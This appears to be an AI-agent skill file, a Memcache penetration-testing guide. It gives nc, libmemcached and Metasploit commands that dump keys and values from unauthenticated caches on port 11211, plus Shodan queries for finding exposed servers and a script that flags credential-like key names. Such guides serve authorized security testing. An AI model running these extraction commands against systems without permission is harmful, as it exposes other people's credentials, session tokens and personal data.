Hacktricks-skills memcache-pentest

How to enumerate and extract data from exposed Memcache instances. Use this skill whenever you need to test Memcache security, enumerate cached data, extract keys/values, or assess Memcache vulnerabilities on port 11211. Trigger this for any Memcache-related security testing, data exfiltration from caches, or when you discover an open 11211 port during reconnaissance.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/11211-memcache/11211-memcache/SKILL.MD
source content

Memcache Pentesting

Memcache is a distributed memory caching system often exposed without authentication. This skill guides you through enumerating and extracting data from Memcache instances.

Quick Start

# Basic version check
echo "version" | nc -vn -w 1 <IP> 11211

# Get stats and slab information
echo "stats" | nc -vn -w 1 <IP> 11211
echo "stats slabs" | nc -vn -w 1 <IP> 11211
echo "stats items" | nc -vn -w 1 <IP> 11211

Enumeration Workflow

Step 1: Initial Reconnaissance

Start by checking if Memcache is accessible and gathering basic information:

# Check version
echo "version" | nc -vn -w 1 <IP> 11211

# Get general stats
echo "stats" | nc -vn -w 1 <IP> 11211

# Get slab information (memory organization)
echo "stats slabs" | nc -vn -w 1 <IP> 11211

# Get item statistics per slab
echo "stats items" | nc -vn -w 1 <IP> 11211

Step 2: Identify Active Slabs

From the stats slabs output, identify slabs with active items > 0. These contain cached data.

Step 3: Dump Keys from Active Slabs

For each active slab class, dump the keys:

# For Memcache < 1.4.31
echo "stats cachedump <slab_number> 0" | nc -vn -w 1 <IP> 11211

# For Memcache >= 1.4.31 (non-blocking mode)
echo "lru_crawler metadump all" | nc -vn -w 1 <IP> 11211

Step 4: Extract Data

Once you have key names, retrieve the actual data:

echo "get <key_name>" | nc -vn -w 1 <IP> 11211

Automated Tools

Using libmemcached-tools

# Install tools
sudo apt install libmemcached-tools

# Get stats
memcstat --servers=<IP>

# Dump all items
memcdump --servers=<IP>

# Get specific items
memccat --servers=<IP> <key1> <key2>

Using Metasploit

# Extract saved data
msfconsole
use auxiliary/gather/memcached_extractor
set RHOSTS <IP>
run

# Check for UDP amplification vulnerability
use auxiliary/scanner/memcached/memcached_amp
set RHOSTS <IP>
run

Using Nmap

# Gather Memcache information
nmap -n -sV --script memcached-info -p 11211 <IP>

Key Concepts

Slab Classes

Memcache organizes data into slab classes based on item size. Each slab class has:

  • chunk size: Size of each item slot
  • perslab: Number of chunks per slab
  • active: Number of currently used chunks
  • get_hits/misses: Cache efficiency metrics

Important Limitations

  1. 1MB Data Limit: Prior to Memcache 1.4, objects larger than 1MB cannot be stored
  2. Timeout Maximum: Never set timeout > 2592000 seconds (30 days), or Memcache treats it as a Unix timestamp
  3. Cachedump Limit: Only 1MB of keys can be dumped per slab class
  4. No Authentication: Most instances are exposed without authentication
  5. Ephemeral Data: Cache data may appear and disappear as it's evicted

Common Use Cases

Finding Sensitive Data

Look for keys containing:

  • Session tokens
  • API keys
  • Database credentials
  • User data
  • Configuration values
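
An added example, not part of the original skill: a shell function that triages saved lru_crawler metadump all output (Step 3) for key names in the categories listed above, and marks entries that never expire. The sample dump is constructed, and the function name and SENSITIVE_RE patterns are assumptions to adapt to the key scheme of the cache under review.

```shell
#!/usr/bin/env bash
# Added example: offline triage of saved `lru_crawler metadump all` output.
# Line format: key=<url-encoded> exp=<unix time, -1 = never> la=.. cas=.. fetch=.. cls=<slab class> size=<bytes>

# Constructed sample, not captured from a real server.
SAMPLE_METADUMP='key=sess%3A9f2c exp=1700003600 la=1700000000 cas=11 fetch=yes cls=3 size=212
key=page%3A%2Fhome exp=1700000300 la=1700000000 cas=12 fetch=yes cls=9 size=4120
key=cfg%3Adb_password exp=-1 la=1699990000 cas=4 fetch=no cls=1 size=88
key=user%3A42%3Aapi_key exp=-1 la=1699995000 cas=7 fetch=yes cls=2 size=130
END'

# Hypothetical, case-insensitive name patterns (assumption, not from the page).
SENSITIVE_RE='sess|token|api_?key|passw|secret|cred'

# Reads metadump lines on stdin; prints "<cls>\t<size>\t<expiry>\t<decoded key>"
# for every key whose decoded name matches SENSITIVE_RE.
flag_sensitive_keys() {
  awk -v re="$SENSITIVE_RE" '
    BEGIN { HEX = "0123456789abcdef" }
    # Decode %XX escapes (metadump URL-encodes key names).
    function urldecode(s,    out, h, c) {
      out = ""
      while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
        h = tolower(substr(s, RSTART + 1, 2))
        c = (index(HEX, substr(h, 1, 1)) - 1) * 16 + index(HEX, substr(h, 2, 1)) - 1
        out = out substr(s, 1, RSTART - 1) sprintf("%c", c)
        s = substr(s, RSTART + RLENGTH)
      }
      return out s
    }
    /^key=/ {                       # skips the trailing END marker and blank lines
      split("", f)                  # reset the per-line field map
      for (i = 1; i <= NF; i++) {   # split each name=value field on the first "="
        p = index($i, "=")
        if (p > 1) f[substr($i, 1, p - 1)] = substr($i, p + 1)
      }
      k = urldecode(f["key"])
      if (tolower(k) ~ re)
        printf "%s\t%s\t%s\t%s\n", f["cls"], f["size"], (f["exp"] == "-1" ? "no-expiry" : "expires"), k
    }'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_METADUMP" | flag_sensitive_keys
```

Entries reported as no-expiry stay readable by anyone who can reach port 11211 until they are evicted or the process restarts, so they are the first candidates for a TTL or for removal from the cache.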

Assessing Cache Efficiency

From the stats items output:

  • High evicted count indicates memory pressure
  • get_hits vs get_misses ratio shows cache effectiveness
  • expired count shows data lifecycle

Troubleshooting

Keys Disappearing

If keys disappear after incr operations, they may have overflowed. Recreate them with add or set.

Connection Issues

# Test connectivity
telnet <IP> 11211

# Check if port is open
nmap -p 11211 <IP>

Large Datasets

For datasets larger than 1MB per slab:

  • Use peep tool (warning: may freeze Memcache in production)
  • Use lru_crawler metadump all for Memcache 1.4.31+
  • Iterate through slab classes manually

Shodan Queries

For finding exposed Memcache instances:

port:11211 "STAT pid"
"STAT pid"

Security Considerations

  • Authorization: Only test systems you have permission to assess
  • Data Sensitivity: Cached data may contain PII, credentials, or sensitive information
  • Production Impact: Some tools (like peep) can freeze Memcache processes
  • Compliance: Ensure testing complies with organizational policies and regulations
